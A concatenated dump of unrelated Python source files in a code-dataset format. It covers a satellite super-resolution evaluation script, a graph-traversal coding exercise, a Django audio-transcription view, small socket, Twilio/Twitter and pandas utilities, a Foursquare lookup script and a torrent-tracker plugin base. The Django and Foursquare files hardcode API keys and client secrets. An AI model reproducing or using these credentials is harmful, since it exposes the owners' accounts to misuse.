cur_hr_map = downscale_local_mean(cur_hr_map, (2, 2))\n\n assert(cur_sr.ndim == 2)\n assert(cur_hr.ndim == 2)\n assert(cur_hr_map.ndim == 2)\n\n if cur_sr.dtype.type is np.uint16: # integer array is in the range [0, 65536]\n cur_sr = cur_sr / np.iinfo(np.uint16).max # normalize in the range [0, 1]\n else:\n assert 0 <= cur_sr.min() and cur_sr.max() <= 1, 'sr.dtype must be either uint16 (range 0-65536) or float64 in (0, 1).'\n if cur_hr.dtype.type is np.uint16:\n cur_hr = cur_hr / np.iinfo(np.uint16).max\n\n if len(hrs) > 0:\n val_gt_SSIM = cSSIM(sr=cur_sr, hr=cur_hr)\n val_L2 = mean_squared_error(cur_hr, cur_sr)\n else:\n val_gt_SSIM = None\n val_L2 = None\n\n if (str(type(aposterior_gt)) == \"\"):\n val_aposterior_SSIM = 1.0\n else:\n val_aposterior_SSIM = cSSIM(sr = cur_sr, hr = aposterior_gt)\n\n\n if (str(type(next_sr)) == \"\"):\n val_delta_L2 = None\n else:\n assert (next_sr.ndim == 2)\n val_delta_L2 = mean_squared_error(next_sr, cur_sr)\n\n if len(cur_sr.shape) == 2:\n cur_sr = cur_sr[None, ]\n cur_hr = cur_hr[None, ]\n cur_hr_map = cur_hr_map[None, ]\n\n if len(hrs) > 0:\n val_cMSE = cMSE(sr= cur_sr, hr= cur_hr, hr_map= cur_hr_map)\n val_cPSNR = -10 * np.log10(val_cMSE)\n val_usual_PSNR = -10 * np.log10(val_L2)\n val_shift_cPSNR = shift_cPSNR(sr = cur_sr, hr=cur_hr, hr_map=cur_hr_map)\n val_shift_cMSE = shift_cMSE(sr = cur_sr, hr=cur_hr, hr_map=cur_hr_map)\n else:\n val_cMSE = None\n val_cPSNR = None\n val_usual_PSNR = None\n val_shift_cPSNR = None\n val_shift_cMSE = None\n\n if (str(type(next_sr)) == \"\"):\n val_delta_cMSE = None\n val_delta_shift_cMSE = None\n else:\n if next_sr.dtype.type is np.uint16: # integer array is in the range [0, 65536]\n next_sr = next_sr / np.iinfo(np.uint16).max # normalize in the range [0, 1]\n else:\n assert 0 <= next_sr.min() and next_sr.max() <= 1, 'sr.dtype must be either uint16 (range 0-65536) or float64 in (0, 1).'\n\n if len(cur_sr.shape) == 2:\n next_sr = next_sr[None,]\n\n val_delta_cMSE = cMSE(sr = cur_sr, hr = next_sr, hr_map = cur_hr_map)\n val_delta_shift_cMSE = shift_cMSE(sr = cur_sr, hr = next_sr, hr_map = cur_hr_map)\n\n\n return sr, val_gt_SSIM, val_aposterior_SSIM, val_cPSNR, val_usual_PSNR, val_shift_cPSNR, val_cMSE, \\\n val_L2, val_shift_cMSE, val_delta_cMSE, val_delta_L2, val_delta_shift_cMSE\n\n\ndef load_data(config_file_path, val_proportion=0.10, top_k=-1):\n '''\n Loads all the data for the ESA Kelvin competition (train, val, test, baseline)\n Args:\n config_file_path: str, paths of configuration file\n val_proportion: float, validation/train fraction\n top_k: int, number of low-resolution images to read. Default (top_k=-1) reads all low-res images, sorted by clearance.\n Returns:\n train_dataset: torch.Dataset\n val_dataset: torch.Dataset\n test_dataset: torch.Dataset\n baseline_cpsnrs: dict, shift cPSNR scores of the ESA baseline\n '''\n \n with open(config_file_path, \"r\") as read_file:\n config = json.load(read_file)\n\n data_directory = config[\"paths\"][\"prefix\"]\n baseline_cpsnrs = readBaselineCPSNR(os.path.join(data_directory, \"norm.csv\"))\n\n train_set_directories = getImageSetDirectories(os.path.join(data_directory, \"train\"))\n test_set_directories = getImageSetDirectories(os.path.join(data_directory, \"test\"))\n\n # val_proportion = 0.10\n train_list, val_list = train_test_split(train_set_directories,\n test_size=val_proportion, random_state=1, shuffle=True)\n # val_list = [\"imgset0000\", \"imgset0061\", \"imgset0203\", \"imgset0280\", \"imgset0374\", \"imgset0476\", \"imgset0585\",\n # \"imgset0692\", \"imgset0769\", \"imgset0845\", \"imgset0960\", \"imgset1039\", \"imgset1128\",\n#\"imgset0011\", \"imgset0072\", \"imgset0204\", \"imgset0285\", \"imgset0382\", \"imgset0498\", \"imgset0588\", \"imgset0711\",\n# \"imgset0771\", \"imgset0878\", \"imgset0962\", \"imgset1052\", \"imgset1133\",\n#\"imgset0023\", \"imgset0085\", \"imgset0205\", \"imgset0289\", \"imgset0414\", \"imgset0499\", \"imgset0602\", \"imgset0728\",\n# \"imgset0776\", \"imgset0884\", \"imgset0980\", \"imgset1054\", \"imgset1134\",\n#\"imgset0035\", \"imgset0087\", \"imgset0208\", \"imgset0313\", \"imgset0448\", \"imgset0503\", \"imgset0604\", \"imgset0730\",\n# \"imgset0791\", \"imgset0896\", \"imgset0998\", \"imgset1063\", \"imgset1158\",\n#\"imgset0039\", \"imgset0114\", \"imgset0221\", \"imgset0324\", \"imgset0450\", \"imgset0505\", \"imgset0617\", \"imgset0734\",\n# \"imgset0793\", \"imgset0921\", \"imgset1013\", \"imgset1068\",\n#\"imgset0047\", \"imgset0130\", \"imgset0235\", \"imgset0328\", \"imgset0458\", \"imgset0530\", \"imgset0618\", \"imgset0748\",\n# \"imgset0796\", \"imgset0923\", \"imgset1015\", \"imgset1089\",\n#\"imgset0051\", \"imgset0138\", \"imgset0255\", \"imgset0337\", \"imgset0460\", \"imgset0534\", \"imgset0652\", \"imgset0751\",\n# \"imgset0811\", \"imgset0933\", \"imgset1021\", \"imgset1112\",\n#\"imgset0056\", \"imgset0164\", \"imgset0262\", \"imgset0340\", \"imgset0465\", \"imgset0549\", \"imgset0674\", \"imgset0758\",\n# \"imgset0814\", \"imgset0948\", \"imgset1023\", \"imgset1121\",\n#\"imgset0057\", \"imgset0192\", \"imgset0270\", \"imgset0361\", \"imgset0470\", \"imgset0558\", \"imgset0687\", \"imgset0762\",\n# \"imgset0817\", \"imgset0951\", \"imgset1034\", \"imgset1126\"]\n config[\"training\"][\"create_patches\"] = False\n\n train_dataset = ImagesetDataset(imset_dir=train_list, config=config[\"training\"], top_k=top_k)\n val_dataset = ImagesetDataset(imset_dir=val_list, config=config[\"training\"], top_k=top_k)\n test_dataset = ImagesetDataset(imset_dir=test_set_directories, config=config[\"training\"], top_k=top_k)\n return train_dataset, val_dataset, test_dataset, baseline_cpsnrs\n\n\ndef load_model(config, checkpoint_file):\n '''\n Loads a pretrained model from disk.\n Args:\n config: dict, configuration file\n checkpoint_file: str, checkpoint filename\n Returns:\n model: HRNet, a pytorch model\n '''\n \n# checkpoint_dir = config[\"paths\"][\"checkpoint_dir\"]\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n model = HRNet(config[\"network\"]).to(device)\n model.load_state_dict(torch.load(checkpoint_file))\n return model\n\n\ndef evaluate(model, train_dataset, val_dataset, test_dataset, min_L=16):\n '''\n Evaluates a pretrained model.\n Args:\n model: HRNet, a pytorch model\n train_dataset: torch.Dataset\n val_dataset: torch.Dataset\n test_dataset: torch.Dataset\n min_L: int, pad length\n Returns:\n scores: dict, results\n clerances: dict, clearance scores\n part: dict, data split (train, val or test)\n '''\n \n model.eval()\n scores = {}\n clerances = {}\n part = {}\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n for s, imset_dataset in [('train', train_dataset),\n ('val', val_dataset),\n ('test', test_dataset)]:\n\n if __IPYTHON__:\n tqdm = tqdm_notebook\n\n for imset in tqdm(imset_dataset):\n sr, scPSNR = get_sr_and_score(imset, model, min_L=min_L)\n scores[imset['name']] = scPSNR\n clerances[imset['name']] = imset['clearances']\n part[imset['name']] = s\n return scores, clerances, part\n\n\ndef custom_evaluate(model, train_dataset, val_dataset, test_dataset, num_frames, min_L=16):\n\n model.eval()\n scores = {}\n clerances = {}\n part = {}\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n for s, imset_dataset in [('train', train_dataset),\n ('val', val_dataset),\n ('test', test_dataset)]:\n\n if __IPYTHON__:\n tqdm = tqdm_notebook\n\n for imset in tqdm(imset_dataset):\n sr, scPSNR, ssim, aposterior_ssim = get_sr_and_score(imset, model, None, num_frames, min_L)\n # imset, model, aposterior_gt, num_frames, min_L=16\n scores[imset['name']] = scPSNR\n clerances[imset['name']] = imset['clearances']\n part[imset['name']] = s\n return scores, clerances, part\n\ndef benchmark(baseline_cpsnrs, scores, part, clerances):\n '''\n Benchmark scores against ESA baseline.\n Args:\n baseline_cpsnrs: dict, shift cPSNR scores of the ESA baseline\n scores: dict, results\n part: dict, data split (train, val or test)\n clerances: dict, clearance scores\n Returns:\n results: pandas.Dataframe, results\n '''\n \n # TODO HR mask clearance\n results = pd.DataFrame({'ESA': baseline_cpsnrs,\n 'model': scores,\n 'clr': clerances,\n 'part': part, })\n results['score'] = results['ESA'] / results['model']\n results['mean_clr'] = results['clr'].map(np.mean)\n results['std_clr'] = results['clr'].map(np.std)\n return results\n\n\ndef generate_submission_file(model, imset_dataset, out='../submission'):\n '''\n USAGE: generate_submission_file [path to testfolder] [name of the submission folder]\n EXAMPLE: generate_submission_file data submission\n '''\n\n print('generating solutions: ', end='', flush='True')\n os.makedirs(out, exist_ok=True)\n if __IPYTHON__:\n tqdm = tqdm_notebook\n\n for imset in tqdm(imset_dataset):\n folder = imset['name']\n sr, _ = get_sr_and_score(imset, model)\n sr = img_as_uint(sr)\n\n # normalize and safe resulting image in temporary folder (complains on low contrast if not suppressed)\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n io.imsave(os.path.join(out, folder + '.png'), sr)\n print('*', end='', flush='True')\n\n print('\\narchiving: ')\n sub_archive = out + '/submission.zip' # name of submission archive\n zf = ZipFile(sub_archive, mode='w')\n try:\n for img in os.listdir(out):\n if not img.startswith('imgset'): # ignore the .zip-file itself\n continue\n zf.write(os.path.join(out, img), arcname=img)\n print('*', end='', flush='True')\n finally:\n zf.close()\n print('\\ndone. The submission-file is found at {}. Bye!'.format(sub_archive))\n\n \n \n\n \nclass Model(object):\n \n def __init__(self, config):\n self.config = config\n \n def load_checkpoint(self, checkpoint_file):\n self.model = load_model(self.config, checkpoint_file)\n \n def __call__(self, imset, aposterior_gt, next_sr, num_frames, custom_min_L = 16):\n sr, val_gt_SSIM, val_aposterior_SSIM, val_cPSNR, val_usual_PSNR, val_shift_cPSNR, val_cMSE, \\\n val_L2, val_shift_cMSE, val_delta_cMSE, val_delta_L2, \\\n val_delta_shift_cMSE = get_sr_and_score(imset, self.model, aposterior_gt, next_sr, num_frames, min_L= custom_min_L)#self.config['training']['min_L'])\n return sr, val_gt_SSIM, val_aposterior_SSIM, val_cPSNR, val_usual_PSNR, val_shift_cPSNR, val_cMSE, \\\n val_L2, val_shift_cMSE, val_delta_cMSE, val_delta_L2, val_delta_shift_cMSE\n \n def evaluate(self, train_dataset, val_dataset, test_dataset, baseline_cpsnrs): \n scores, clearance, part = evaluate(self.model, train_dataset, val_dataset, test_dataset, \n min_L=self.config['training']['min_L'])\n\n results = benchmark(baseline_cpsnrs, scores, part, clearance)\n return results\n\n def custom_evaluate(self, train_dataset, val_dataset, test_dataset, baseline_cpsnrs, num_frames, min_L):\n scores, clearance, part = custom_evaluate(self.model, train_dataset, val_dataset, test_dataset, num_frames, min_L)\n\n results = benchmark(baseline_cpsnrs, scores, part, clearance)\n return results\n \n def generate_submission_file(self, imset_dataset, out='../submission'):\n generate_submission_file(self.model, imset_dataset, out='../submission')\n","sub_path":"src/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":14117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"455150320","text":"#2606\n'''문제\n신종 바이러스인 웜 바이러스는 네트워크를 통해 전파된다. 한 컴퓨터가 웜 바이러스에 걸리면 그 컴퓨터와 네트워크 상에서 연결되어 있는 모든 컴퓨터는 웜 바이러스에 걸리게 된다.\n예를 들어 7대의 컴퓨터가 <그림 1>과 같이 네트워크 상에서 연결되어 있다고 하자. 1번 컴퓨터가 웜 바이러스에 걸리면 웜 바이러스는 2번과 5번 컴퓨터를 거쳐 3번과 6번 컴퓨터까지 전파되어 2, 3, 5, 6 네 대의 컴퓨터는 웜 바이러스에 걸리게 된다. 하지만 4번과 7번 컴퓨터는 1번 컴퓨터와 네트워크상에서 연결되어 있지 않기 때문에 영향을 받지 않는다.\n어느 날 1번 컴퓨터가 웜 바이러스에 걸렸다. 컴퓨터의 수와 네트워크 상에서 서로 연결되어 있는 정보가 주어질 때, 1번 컴퓨터를 통해 웜 바이러스에 걸리게 되는 컴퓨터의 수를 출력하는 프로그램을 작성하시오.\n\n입력\n첫째 줄에는 컴퓨터의 수가 주어진다. 컴퓨터의 수는 100 이하이고 각 컴퓨터에는 1번 부터 차례대로 번호가 매겨진다. 둘째 줄에는 네트워크 상에서 직접 연결되어 있는 컴퓨터 쌍의 수가 주어진다. 이어서 그 수만큼 한 줄에 한 쌍씩 네트워크 상에서 직접 연결되어 있는 컴퓨터의 번호 쌍이 주어진다.\n출력\n1번 컴퓨터가 웜 바이러스에 걸렸을 때, 1번 컴퓨터를 통해 웜 바이러스에 걸리게 되는 컴퓨터의 수를 첫째 줄에 출력한다.\n\n예제 입력 1 \n7\n6\n1 2\n2 3\n1 5\n5 2\n5 6\n4 7\n예제 출력 1 \n4'''\n'''import sys\ninput = sys.stdin.readline\n\ncomputer = int(input())\nnetwork = int(input())\ngraph = [[0] * (computer + 1) for _ in range(computer + 1)]\nfor _ in range(network):\n pairs = list(map(int, input().split()))\n graph[pairs[0]][pairs[1]] = 1\n graph[pairs[1]][pairs[0]] = 1\n\ndef dfs(start, visited):\n visited += [start]\n for i in range(len(graph[start])):\n if graph[start][i] == 1 and i not in visited:\n dfs(i, visited)\n return visited\n\nprint(len(dfs(1, [])) - 1)'''\n\nimport sys\ninput = sys.stdin.readline\n\ncomputer = int(input())\nnetwork = int(input())\ngraph = {}\nfor i in range(computer): #{1: set(), 2: set(), 3: set(), 4: set(), 5: set(), 6: set(), 7: set()}\n graph[i + 1] = set()\nfor _ in range(network): #{1: {2, 5}, 2: {1, 3, 5}, 3: {2}, 4: {7}, 5: {1, 2, 6}, 6: {5}, 7: {4}}\n point1, point2 = map(int, input().split())\n graph[point1].add(point2)\n graph[point2].add(point1)\n\ndef dfs(start, visited):\n visited += [start]\n for i in graph[start]:\n if i not in visited:\n dfs(i, visited)\n return visited\n\ndef bfs(start):\n visited = [start]\n queue = [start]\n \n while queue:\n for i in graph[queue.pop(0)]:\n if i not in visited:\n visited.append(i)\n queue.append(i)\n return visited\nprint(len(dfs(1, [])) - 1)\n","sub_path":"baekjoon/dfs_bfs/2_2606_바이러스.py","file_name":"2_2606_바이러스.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"552305075","text":"#####-------------- JASON ADDED BEGIN 20190612 ---------------######\nimport json\nimport datetime\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom sqldb.models import Publisher, LpAudiosMst\nimport cmdb.utils as ResultUtils\nfrom aip import AipSpeech\n\n# 导入`connection`\nfrom django.db import connection\n\nfrom django.db.models import Q\n\n\"\"\" 百度云APPID AK SK \"\"\"\nAPP_ID = '16658280'\nAPI_KEY = 'BUh698CmHcwB70tE9c0S2zEr'\nSECRET_KEY = 'ouv6Rb4ho3sYmkk6WYkmf6cK2xwiIPWu'\n\nclient = AipSpeech(APP_ID, API_KEY, SECRET_KEY)\n\n#插入资讯表\ndef insertAudioByCustID(request):\n error_msg = '录音追加成功'\n\n newauido=LpAudiosMst()\n newauido.id = ResultUtils.getUUID()\n newauido.sales_id = request.POST['salesId']\n newauido.cust_id = request.POST['custId']\n newauido.audio_file = request.POST['audioFile']\n newauido.audio_len = request.POST['audioLen']\n newauido.audio_text = request.POST['audioText']\n newauido.create_date = datetime.datetime.now()\n newauido.update_date = datetime.datetime.now()\n newauido.status = '1'\n newauido.save()\n\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg, []))\n\n#检索资讯列表\ndef queryAudiosByCustIDorAudioID(request):\n error_msg = ''\n\n if request.method == \"POST\":\n cust_id = request.POST.get('custId')\n # 有ID时,只返回一条录音信息(包括录音文件);没有ID时,返回该客户所有录音列表(不包括录音文件)\n audio_id = request.POST.get('audioId')\n # 暂时保留,未来作为不同业务员个性化资讯服务\n sales_id = request.POST.get('salesId')\n\n if audio_id == None or len(audio_id.strip()) == 0:\n # 检索所有录音信息,不含录音文件(内容太大)\n sqlmt = \"select id, sales_id, cust_id, \" \\\n \" audio_file, audio_len, audio_text, create_date \" \\\n \" from LP_AUDIOS_MST am \" \\\n \" where am.STATUS = '1' \" \\\n \" and am.cust_id = %s \" \\\n \" and am.sales_id = %s \"\n\n print(sqlmt)\n ret = ResultUtils.createSuccessResultSqlmt(sqlmt, [cust_id, sales_id])\n else:\n # 加载Blob数据,转化文件后返回文件名称 TBD\n # 不用Blob保存,先用录音文件路径保存,在线读取\n # 检索单一录音信息,含录音文件\n sqlmt = \"select id, sales_id, cust_id, \" \\\n \" audio_file, audio_len, audio_text, create_date \" \\\n \" from LP_AUDIOS_MST am \" \\\n \" where am.STATUS = '1' \" \\\n \" and am.cust_id = %s \" \\\n \" and am.sales_id = %s \" \\\n \" and id = %s \"\n\n print(sqlmt)\n ret = ResultUtils.createSuccessResultSqlmt(sqlmt, [cust_id, sales_id, audio_id])\n\n print(ret)\n\n return HttpResponse(ret)\n else:\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", []))\n\n# 读取文件\ndef get_file_content(filePath):\n with open(filePath, 'rb') as fp:\n return fp.read()\n\n# 语音转文字\ndef translateAudio(filepath):\n # 识别本地文件\n ret = client.asr(get_file_content(filepath), 'amr', 16000, {\n 'dev_pid': 1536,\n })\n return HttpResponse(ret)\n#####-------------- JASON ADDED END 20190612 ---------------######","sub_path":"sqldb/audios.py","file_name":"audios.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"533971707","text":"import time\nimport socket\nfrom threading import Thread\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect((socket.gethostname(), 25000))\n\nn = 0\n\n\ndef monitor():\n global n\n while True:\n time.sleep(1)\n print(n, 'reqs/s')\n n = 0\n\n\nThread(target=monitor).start()\n\nwhile True:\n sock.send(b'1')\n resp = sock.recv(100)\n n += 1\n","sub_path":"Concurrency_ISSUE/calculate/perf2.py","file_name":"perf2.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"545912879","text":"import os\nfrom os.path import join, dirname\n\nfrom twilio.rest import TwilioRestClient \nfrom dotenv import load_dotenv\n\nfrom twython import Twython \n\ndotenv_path = join(dirname(__file__), '.env')\nload_dotenv(dotenv_path)\n\n#Twillio Information\nauth = os.environ.get('TWILIO_SID')\ntoken = os.environ.get('TWILIO_SECRET')\nto_phone = os.environ.get('TO_PHONE')\nfrom_phone = os.environ.get('FROM_PHONE')\n\n#Twitter Information\nconsumer_key = os.environ.get('TWITTER_CONSUMER_KEY')\nconsumer_secret = os.environ.get('TWITTER_CONSUMER_SECRET')\naccess_key = os.environ.get('TWITTER_ACCESS_KEY')\naccess_secret = os.environ.get('TWITTER_ACCESS_SECRET') \n\n\ndef text_temp(temperature):\n msg = 'Solar oven has reached '+temperature+' F'\n\n client = TwilioRestClient(auth,token) \n msg = client.messages.create(to=to_phone, from_=from_phone, body=msg)\n \n \ndef tweet_temp(temperature):\n api = Twython(consumer_key,consumer_secret, access_key, access_secret) \n api.update_status(status=\"Current solar oven temperature = \"+temperature+\" F\") ","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"540413778","text":"from sklearn.model_selection import train_test_split\nfrom pandas import to_datetime\nclass DataFrameHelper:\n def split_dates(dataframe, columns=None):\n df = dataframe.copy()\n if columns is None:\n columns = df.columns.tolist()\n for column in columns:\n df[column] = to_datetime(df[column], errors='ignore')\n for time in ('day', 'month', 'year'):\n df[f'{column}_{time}'] = getattr(df[column].dt, time)\n return df\n def tvt_split(*arrays, set_sizes=(0.8, 0.1, 0.1), **options):\n \"\"\"\n Split arrays or matrices into random train,\n validation, and test subsets\n\n Wrapper of scikit-learn's train_test_split\n to have proportioned splitting with validation subset included.\n\n setsizes: list-like of ints or floats representing proportion of train,\n validation, and test subsets, respectively.\n If floats, must sum up to 1.\n If ints, must sum up to total observations in dataset.\n\n Otherwise, all other parameters are passed to train_test_split.\n I'm not sure what happens if you give train_size or test_size,\n so programmer beware.\n\n I'm also not sure if I'm legally allowed to copy and paste\n the documentation from train_test_split,\n so you get no information here about it.\n \"\"\"\n first_split = set_sizes[0] + set_sizes[1]\n \n second_split = set_sizes[1]\n if sum(set_sizes) <= 1:\n second_split /= first_split\n\n train_and_val, test = train_test_split(*arrays,\n test_size = set_sizes[2],\n **options)\n train, val = train_test_split(train_and_val,\n test_size = second_split,\n **options)\n return train, val, test","sub_path":"my_lambdata/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"524075581","text":"from geocode import getGeocodeLocation\r\nimport json\r\nimport httplib2\r\n\r\nimport sys\r\nimport codecs\r\n\r\nimport sys\r\n\r\nargs = sys.argv\r\n\r\nfoursquare_client_id = \"2BAWNPEEJM5UELMLYUQJNCTWGWRUKBTY5XHU2SS3POAOMTEP\"\r\nfoursquare_client_secret = \"50VUICQ2MYEAXP1MMKHC0KFWLUBIHNOSD5GTSPTQV4Y0OWIY\"\r\n\r\ndef findARestaurant(mealType,location):\r\n\t#1. Use getGeocodeLocation to get the latitude and longitude coordinates of the location string.\r\n\tlatitude, longitude = getGeocodeLocation(location)\r\n\t\r\n\t#2. Use foursquare API to find a nearby restaurant with the latitude, longitude, and mealType strings.\r\n\t#HINT: format for url will be something like https://api.foursquare.com/v2/venues/search?client_id=CLIENT_ID&client_secret=CLIENT_SECRET&v=20130815&ll=40.7,-74&query=sushi\r\n\turl = ('https://api.foursquare.com/v2/venues/search?client_id=%s&client_secret=%s&v=20130815&ll=%s,%s&query=%s' % (foursquare_client_id, foursquare_client_secret,latitude,longitude,mealType))\r\n\th = httplib2.Http()\r\n\tresult = json.loads(h.request(url,'GET')[1])\r\n\r\n\t#3. Grab the first restaurant\r\n\tfirstInfo = result['response']['venues'][0]\r\n\tvenue_id = firstInfo['id']\r\n\trestaurant_name = firstInfo['name']\r\n\trestaurant_address = firstInfo['location']['formattedAddress']\r\n\taddress = ''\r\n\tfor i in restaurant_address:\r\n\t\taddress = i + ' '\r\n\trestaurant_address = address\r\n\r\n\t#4. Get a 300x300 picture of the restaurant using the venue_id (you can change this by altering the 300x300 value in the URL or replacing it with 'orginal' to get the original picture\r\n\turl = ('https://api.foursquare.com/v2/venues/%s/photos?client_id=%s&v=20150603&client_secret=%s' % ((venue_id,foursquare_client_id,foursquare_client_secret)))\r\n\tresult = json.loads(h.request(url, 'GET')[1])\r\n\r\n\t#5. Grab the first image\r\n\tif result['response']['photos']['items']:\r\n\t\tfirstpic = result['response']['photos']['items'][0]\r\n\t\tprefix = firstpic['prefix']\r\n\t\tsuffix = firstpic['suffix']\r\n\t\timageURL = prefix + \"300x300\" + suffix\r\n\telse:\r\n\t\t#6. if no image available, insert default image url\r\n\t\timageURL = \"http://pixabay.com/get/8926af5eb597ca51ca4c/1433440765/cheeseburger-34314_1280.png?direct\"\r\n\r\n\t#7. Return a dictionary containing the restaurant name, address, and image url\r\n\trestaurantInfo = {'name':restaurant_name, 'address': restaurant_address, 'image':imageURL}\r\n\tprint(\"Restaurant Name: %s\" % restaurantInfo['name'])\r\n\tprint(\"Restaurant Address: %s\" % restaurantInfo['address'])\r\n\tprint(\"Image: %s \\n\" % restaurantInfo['image'])\r\n\tprint(restaurantInfo)\r\n\treturn restaurantInfo\r\n\r\ndef main():\r\n findARestaurant(args[1], args[2])\r\n\t# findARestaurant(\"Pizza\", \"Tokyo, Japan\")\r\n\t# findARestaurant(\"Tacos\", \"Jakarta, Indonesia\")\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"findARestaurant.py","file_name":"findARestaurant.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"41008632","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 2 10:15:57 2020\n\n@author: cfse2\n\"\"\"\n\n\nimport numpy as np\n\nv = 1/np.sqrt(3)\na = np.array([[v,v,v],[0,0,1],[0,0,1],[0,0,1]])\nb = np.array([[v,v,v],[0,0,1],[0,0,1],[0,0,1]])\n\ndot = np.dot(a,b.T)\ntensordot = np.tensordot(a, b, axes=((0),(0)))\neinsum = np.einsum(\"ij,ij->i\",a,b)\nprint(dot)\nprint(tensordot)\nprint(einsum)","sub_path":"tests/integration/mesh_interfacing/normal_vec_calc.py","file_name":"normal_vec_calc.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"580260848","text":"import abc\nimport html\nimport six\nimport structlog\nfrom enum import Enum\nfrom monitorrent.db import DBSession, row2dict, dict2row\nfrom monitorrent.plugins import Topic\nfrom monitorrent.plugins.status import Status\nfrom monitorrent.plugins.clients import TopicSettings\nfrom monitorrent.utils.bittorrent_ex import Torrent, is_torrent_content\nfrom monitorrent.utils.downloader import download\nfrom monitorrent.engine import Engine\nfrom future.utils import with_metaclass\n\nlog = structlog.get_logger()\n\n\nclass TrackerSettings(object):\n def __init__(self, requests_timeout, proxies):\n self.requests_timeout = requests_timeout\n self.proxies = proxies\n\n def get_requests_kwargs(self):\n return {'timeout': self.requests_timeout, 'proxies': self.proxies}\n\n\nclass TrackerPluginBase(with_metaclass(abc.ABCMeta, object)):\n tracker_settings = None\n topic_class = Topic\n topic_public_fields = ['id', 'url', 'last_update', 'display_name', 'status']\n topic_private_fields = ['display_name']\n topic_form = [{\n 'type': 'row',\n 'content': [{\n 'type': 'text',\n 'model': 'display_name',\n 'label': 'Name',\n 'flex': 100\n }]\n }]\n\n \"\"\"\n :type tracker_settings: TrackerSettings\n \"\"\"\n def init(self, tracker_settings):\n self.tracker_settings = tracker_settings\n # pylint: disable=E1101\n if hasattr(self, 'tracker') and hasattr(self.tracker, 'tracker_settings'):\n # pylint: disable=E1101\n self.tracker.tracker_settings = tracker_settings\n\n @abc.abstractmethod\n def can_parse_url(self, url):\n \"\"\"\n Check if we can parse url\n\n :param url: str\n :rtype: bool\n \"\"\"\n\n @abc.abstractmethod\n def parse_url(self, url):\n \"\"\"\n Parse url and extract all information from url to topic\n\n :param url: str\n :rtype: dict\n \"\"\"\n\n def prepare_add_topic(self, url):\n parsed_url = self.parse_url(url)\n if not parsed_url:\n return None\n settings = {\n 'display_name': self._get_display_name(parsed_url),\n }\n return settings\n\n def add_topic(self, url, params):\n \"\"\"\n :type url: str\n :type params: dict\n :rtype: bool\n \"\"\"\n parsed_url = self.parse_url(url)\n if parsed_url is None:\n # TODO: Throw exception, because we shouldn't call add topic if we can't parse URL\n return False\n with DBSession() as db:\n topic = self.topic_class(url=url)\n self._set_topic_params(url, parsed_url, topic, params)\n db.add(topic)\n return True\n\n def get_topics(self, ids):\n with DBSession() as db:\n if ids is not None and len(ids) > 0:\n filter_query = self.topic_class.id.in_(ids)\n else:\n filter_query = self.topic_class.status.in_((Status.Ok, Status.Error))\n filter_query &= self.topic_class.paused == False\n topics = db.query(self.topic_class)\\\n .filter(filter_query)\\\n .all()\n db.expunge_all()\n return topics\n\n def save_topic(self, topic, last_update, status=Status.Ok):\n if not isinstance(topic, self.topic_class):\n raise Exception(u\"Can't update topic of wrong class. Expected {0}, but was {1}\"\n .format(self.topic_class, topic.__class__))\n\n with DBSession() as db:\n new_topic = topic\n if last_update is not None:\n new_topic.last_update = last_update\n new_topic.status = status\n db.add(new_topic)\n db.flush()\n db.expunge(new_topic)\n\n def save_status(self, topic_id, status):\n with DBSession() as db:\n topic = db.query(self.topic_class).filter(Topic.id == topic_id).first()\n topic.status = status\n\n def get_topic(self, id):\n with DBSession() as db:\n topic = db.query(self.topic_class).filter(Topic.id == id).first()\n if topic is None:\n return None\n data = row2dict(topic, None, self.topic_public_fields)\n data['info'] = self.get_topic_info(topic)\n data['download_dir'] = topic.download_dir\n return data\n\n def update_topic(self, id, params):\n with DBSession() as db:\n topic = db.query(self.topic_class).filter(Topic.id == id).first()\n if topic is None:\n return False\n self._set_topic_params(None, None, topic, params)\n return True\n\n def get_topic_info(self, topic):\n \"\"\"\n\n :type topic: object\n :rtype : str\n \"\"\"\n return None\n\n @abc.abstractmethod\n def execute(self, topics, engine):\n \"\"\"\n :param topics: result of get_topics func\n :type engine: Engine\n :return: None\n \"\"\"\n\n @abc.abstractmethod\n def _prepare_request(self, topic):\n \"\"\"\n \"\"\"\n\n def _get_display_name(self, parsed_url):\n \"\"\"\n :type parsed_url: dict\n \"\"\"\n return parsed_url['original_name']\n\n def _set_topic_params(self, url, parsed_url, topic, params):\n \"\"\"\n\n :type url: str | None\n :type parsed_url: object | dict | None\n :type topic: Topic\n :type params: dict\n \"\"\"\n fields = None\n if self.topic_private_fields is not None:\n fields = self.topic_private_fields + ['download_dir']\n dict2row(topic, params, fields)\n\n\nclass TrackerPluginMixinBase(object):\n def __init__(self):\n if not isinstance(self, TrackerPluginBase):\n raise 